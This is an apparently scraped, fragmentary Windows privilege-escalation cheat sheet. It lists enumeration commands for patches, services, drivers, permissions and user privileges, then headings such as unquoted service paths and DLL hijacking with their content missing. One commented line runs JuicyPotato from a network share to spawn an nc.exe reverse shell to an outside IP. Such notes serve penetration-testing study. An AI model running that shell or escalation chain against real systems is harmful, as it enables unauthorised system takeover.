Windows Privilege Escalation
ck OS, Patch level, Basic
// Some codesysteminfo
Systeminfo | findstr /B /C:"OS Name" /C:"System Type" etc ..
## Updates
wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic logicaldisk get caption,description
##Applications
wmic product get name, version, vendor
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
##Services
sc query state=all | findstr "SERVICE_NAME:"
wmic service get name,displayname,pathname,startmode
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
## Volume
mountvol
## Drivers - in powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
whoami
echo %USERNAME%
whoami /priv
whoami /groups
whoami /all
# If user has SeImpersonate privs
# \\192.168.119.155\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.155\test\nc.exe -e cmd.exe 192.168.119.155 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
net user
net localgroup
net user /domain
net group /domain
net group /domain <Group Name> Firewall / AV / Defender
Network
Checklist automated tools
Scheduled Tasks
Startups and autoruns
Service Permissions
Check if service config can be modified
Check service with weak file permission
Unquoted Service Path
AlwaysInstallElevated << IF 64 bits use: %SystemRoot%\Sysnative\reg.exe
Pasword in files
Can we find any SAM files?
Registry
Unquoted Service Path Exploitation
Weak Registry Permissions Exploitation
Weak Service Executable File Permissions Exploitation
DLL hijacking
Last updated